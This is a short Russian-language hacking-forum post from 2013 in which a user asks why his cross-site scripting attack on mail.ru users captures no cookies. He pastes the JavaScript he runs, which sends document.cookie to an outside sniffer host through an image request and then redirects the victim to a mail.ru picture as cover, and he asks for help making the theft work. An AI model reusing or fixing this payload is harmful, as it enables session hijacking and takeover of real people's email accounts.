Показать сообщение отдельно

  #9  
Старый 20.11.2013, 01:00
mrfed
Новичок
Регистрация: 20.11.2013
Сообщений: 2
С нами: 6567446

Репутация: 0
По умолчанию

У меня есть свой хост. XSS выполняется. Не могу понять как украсть куки после авторизации на mail.ru, открытии письма и перехода по ссылке с XSS. Лог в сниффер приходит, но куков там нет. Что я делю не так? Вот код, который выполняется на хосте:

img = new Image(); img.src = "http://httpz.org/nhong1skzss.gif?"+document.cookie;
var URL = "http://images.cards.mail.ru/11bolprivet.jpg"
var speed = 3000;
function reload() {
document.location = URL
}
setTimeout("reload()", speed);
 
Ответить с цитированием